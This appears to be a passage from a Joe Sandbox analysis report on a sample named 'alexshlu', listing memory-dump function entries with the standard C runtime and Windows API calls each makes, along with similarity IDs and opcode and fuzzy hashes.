• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
• String ID:
• API String ID: 1088826258-0
• Opcode ID: f875db1e11bf066e8a981772c1b221dd69a1731ce3e6a0633a42adbf7be1f91b
• Instruction ID: 6c163a30c74ce44341f8ed67f7dd1718c985ce2f566941e5e5fcc144238a4853
• Opcode Fuzzy Hash: f875db1e11bf066e8a981772c1b221dd69a1731ce3e6a0633a42adbf7be1f91b
• Instruction Fuzzy Hash: 2F01D471A251109FC705EF21E84963C7BA1FF86340B14404AE80297381CF389EA2DFD1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: _strcspn
• String ID: .$invalid string position
• API String ID: 3709121408-2424062830
• Opcode ID: 0f6801b738f2e54d433e1ef105e5aedeedd2d1e95cd235afcb007515db076f81
• Instruction ID: 217bc1f832cddcf29f5ac8f0c681c2b5a7b07d483ff5286a142165f97d240e75
• Opcode Fuzzy Hash: 0f6801b738f2e54d433e1ef105e5aedeedd2d1e95cd235afcb007515db076f81
• Instruction Fuzzy Hash: BE02D2706283059FC714DF24C484A6AB7E5FF8A304F14896DF8958B362EB70ED65CB82
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: _strlen
• String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
• API String ID: 4218353326-1866435925
• Opcode ID: a5d893ce79a1fadb53edded9bd24377064c89dbed39427e3a5f2d0503fbfca26
• Instruction ID: d960e23b26ad10f0d85c9e61692d51e2220c2dd6d9eb20652d863e90956f5eb6
• Opcode Fuzzy Hash: a5d893ce79a1fadb53edded9bd24377064c89dbed39427e3a5f2d0503fbfca26
• Instruction Fuzzy Hash: EFC16A35624202CFC714CF28C490B6AB7E1FF8A714F55866CE9598B3A1DB35EC55CB81
APIs
  • Part of subcall function 002BAB23: GetLastError.KERNEL32(?,?,002B3FBA,002D4C30,0000000C), ref: 002BAB27
  • Part of subcall function 002BAB23: SetLastError.KERNEL32(00000000), ref: 002BABC9
• GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,002B46FA,?,?,?,00000055,?,-00000050,?,?,?), ref: 002BF395
• IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,002B46FA,?,?,?,00000055,?,-00000050,?,?), ref: 002BF3CC
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ErrorLast$CodePageValid
• String ID: l#-$utf8
• API String ID: 943130320-2281452077
• Opcode ID: 942fc552a82566256143c68b10d458f2e81e928d72c44b8067a533d0deb8371b
• Instruction ID: 5b113448dbf579c083801ce3e1dfd1a7fb70362d3396743d8c25e54c40040045
• Opcode Fuzzy Hash: 942fc552a82566256143c68b10d458f2e81e928d72c44b8067a533d0deb8371b
• Instruction Fuzzy Hash: 4151E936620306AAD765AF70CE42FE773B8EF04780F14457AFA4997581E7B0E9608B61
APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,002C55BD,00000000,?,002D8370,?,?,?,002C54F4,00000004,InitializeCriticalSectionEx,002CE634,002CE63C), ref: 002C552E
• GetLastError.KERNEL32(?,002C55BD,00000000,?,002D8370,?,?,?,002C54F4,00000004,InitializeCriticalSectionEx,002CE634,002CE63C,00000000,?,002BA57C), ref: 002C5538
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 002C5560
Strings
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID: api-ms-
• API String ID: 3177248105-2084034818
• Opcode ID: ffb5eb81291a07864efca3d174bc6be5327112043334635c10e540b034e23414
• Instruction ID: 225d2f722c3d3789714d0911abaccba1cb1393c4d7d209de28619e36cb24b7ea
• Opcode Fuzzy Hash: ffb5eb81291a07864efca3d174bc6be5327112043334635c10e540b034e23414
• Instruction Fuzzy Hash: 4EE04870AD0309BBDF105F60FC0AF583BB59B10B91F640425F90CE45E0DB71EEA09645
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(DAA4AEFB,00000000,00000000,?), ref: 002C292D
                                                                                                                                                                                                                                          • Part of subcall function 002BA9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002BC231,?,00000000,-00000008), ref: 002BAA42
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002C2B7F
                                                                                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 002C2BC5
                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 002C2C68
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2112829910-0
                                                                                                                                                                                                                                        • Opcode ID: bff20a57131c31a41d331c16d582790cb0494a62b21e41c4a4ac762daf3b0b20
                                                                                                                                                                                                                                        • Instruction ID: ba2a7e5ce04b3080fea6e5149e4bd66503874bdfcb513d47672b6a4231dc547c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bff20a57131c31a41d331c16d582790cb0494a62b21e41c4a4ac762daf3b0b20
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DD18975D14248DFCB15CFA8D884AEDBBB4FF08314F28466EE416EB251EA30A955CF50
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                                                                                                        • Opcode ID: 86a7119ebf7b209ef4b04bc8c16fd4c4a98dd0572747d47d1e034a9268523def
                                                                                                                                                                                                                                        • Instruction ID: 68e4adbc4ec4a64e60bfecb79566390c0940057ce03b9be778ee4e6fd196a2f3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86a7119ebf7b209ef4b04bc8c16fd4c4a98dd0572747d47d1e034a9268523def
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1510472A206079FDB25AF51D881BFAB7A4FF44780F14462EEA0647291D735ECE0CB90
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A286C
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A288A
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A28AC
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A291A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                        • Opcode ID: fe0b3eb4d8502911e8a8cd5b33819bdb1a999c27a11c5c0f8971baa04de29cbf
                                                                                                                                                                                                                                        • Instruction ID: 1a64d3b20560e961ec3b3cdbcbf85a00a2e31763a2a67cbf7c40c96000970668
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe0b3eb4d8502911e8a8cd5b33819bdb1a999c27a11c5c0f8971baa04de29cbf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0121B471D25211DFC710EF1AE849A2A73E0FB55724F05485EE5888B361EF34AD64CF92
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A82AC
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A82CA
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A82EC
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A835A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 593203224-0
                                                                                                                                                                                                                                        • Opcode ID: 5ff27c2b306d714c5f0dcc07d5288c033ad54f76f8d80eabbe09fa82a26f4e1e
                                                                                                                                                                                                                                        • Instruction ID: 8ea3b6baf7aabab955b1ecf899d10bba734b4ab25c6ed90bbe3e0e8b5418cb74
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ff27c2b306d714c5f0dcc07d5288c033ad54f76f8d80eabbe09fa82a26f4e1e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D921B471D192119FCB10EF19E849A2A77E0EF56724F45499EE4888B261EF34AC60CF92
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A6B0C
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002A6B2A
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A6B4C
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002A6BBA
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID:
• API String ID: 593203224-0
• Opcode ID: 09b024552d3ae75a45aa768d8ebbe754742966ad9fde1055a792a7fbf7162e42
• Instruction ID: 676c9eceb58dd4e90a35a9e2298833b8da58e22b9e3a86935870e2e6eb9b4b31
• Opcode Fuzzy Hash: 09b024552d3ae75a45aa768d8ebbe754742966ad9fde1055a792a7fbf7162e42
• Instruction Fuzzy Hash: DB21A2719142159FC710EF15E849A5AB3E0EF55728F09485EE5849B391EF34AC60CFA2
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 002A839C
• std::_Lockit::_Lockit.LIBCPMT ref: 002A83BA
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A83DC
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A844A
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID:
• API String ID: 593203224-0
• Opcode ID: 05db5d4568ed6092700ed81ea39f125f11cd6f45d46a2f81dced248c320f9b66
• Instruction ID: 90fbd68a0b45baf38d414d9fdaba61fd8b2e8501e94a01986590161a7c5f54e5
• Opcode Fuzzy Hash: 05db5d4568ed6092700ed81ea39f125f11cd6f45d46a2f81dced248c320f9b66
• Instruction Fuzzy Hash: 4821D671D143119FD710EF15E889A2AB3E0EF59724F01885EE4445B361EF34AC64CF92
APIs
• std::_Lockit::_Lockit.LIBCPMT ref: 002A547C
• std::_Lockit::_Lockit.LIBCPMT ref: 002A549A
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A54BC
• std::_Lockit::~_Lockit.LIBCPMT ref: 002A552A
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_
• String ID:
• API String ID: 593203224-0
• Opcode ID: e6a42bd2ed82c32e4b2afc05723063012d3fff27ed82a3a36575d3b0ea4a0bc8
• Instruction ID: a26684f3c98710f8dd840d19b68bd90862d622042838949730fe49bdc543e937
• Opcode Fuzzy Hash: e6a42bd2ed82c32e4b2afc05723063012d3fff27ed82a3a36575d3b0ea4a0bc8
• Instruction Fuzzy Hash: E1219171D156209FC710EF19F949A1AB3A0EF5A724F05485EE4484B361EF34AD60CF92
APIs
  • Part of subcall function 002BA9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002BC231,?,00000000,-00000008), ref: 002BAA42
• GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002C075A
• __dosmaperr.LIBCMT ref: 002C0761
• GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002C079B
• __dosmaperr.LIBCMT ref: 002C07A2
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$ByteCharMultiWide
• String ID:
• API String ID: 1913693674-0
• Opcode ID: 8a6012e2056a8c9b87e4d9ad9a1e28ddfa048abf4a4fb0f20e40b5af12f16175
• Instruction ID: 80cf232fc251e65f0eafb7a68601cebe25cc1f9c46a41a36dbfe597ab469b40e
• Opcode Fuzzy Hash: 8a6012e2056a8c9b87e4d9ad9a1e28ddfa048abf4a4fb0f20e40b5af12f16175
• Instruction Fuzzy Hash: D521AF71A24206EF9B24AF61DCC4E6BB7A9AF103A4750861DF81997251E730FC648FA0
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd743915478b4cb4bd5bff5ba637fe09402cd762bb3fa7f17981ac0845be6c13
• Instruction ID: f7a4aebe6ff3a591192760adb73fb0ebead9aa91dd85f7452acaab698cb3973f
• Opcode Fuzzy Hash: cd743915478b4cb4bd5bff5ba637fe09402cd762bb3fa7f17981ac0845be6c13
• Instruction Fuzzy Hash: 5221C37162420AAFDB12AFA5DCC59EB7BA8EF043E87104A15F915D7191EB70FC608B90
APIs
• GetEnvironmentStringsW.KERNEL32 ref: 002C1AF4
  • Part of subcall function 002BA9E1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002BC231,?,00000000,-00000008), ref: 002BAA42
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002C1B2C
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002C1B4C
Memory Dump Source
• Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
• Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
Similarity
• API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 158306478-0
                                                                                                                                                                                                                                        • Opcode ID: 530b2fa8ea6856cf945f35d836ce9875649dae2ebf57f0d51075d979221f68df
                                                                                                                                                                                                                                        • Instruction ID: c108eec3ed938d6cc8981e846a859a276a8ed5a6f7a3ce15a2e42e5da8f5e7d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 530b2fa8ea6856cf945f35d836ce9875649dae2ebf57f0d51075d979221f68df
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5D11C8A19315167E67112771AD8FDAF7A5CDD563E87100229F50191102FE608E319EB2
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 002ACB31
                                                                                                                                                                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 002ACB3B
                                                                                                                                                                                                                                        • int.LIBCPMT ref: 002ACB52
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::_Lockit.LIBCPMT ref: 002AA624
                                                                                                                                                                                                                                          • Part of subcall function 002AA613: std::_Lockit::~_Lockit.LIBCPMT ref: 002AA63E
                                                                                                                                                                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 002ACBAC
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1377265310.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377218407.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377322513.00000000002CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377346450.00000000002D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377372417.00000000002D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377412811.00000000002DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1377459141.00000000002DD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_2a0000_alexshlu.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1383202999-0
                                                                                                                                                                                                                                        • Opcode ID: 93881a989bcc5c360a8094e821c8721275f134351a363febd9c97604befb4257
                                                                                                                                                                                                                                        • Instruction ID: c7467a72e1189cf3f15b4167dd46e397afb8495fddc2ed64d07252d0c82093dd
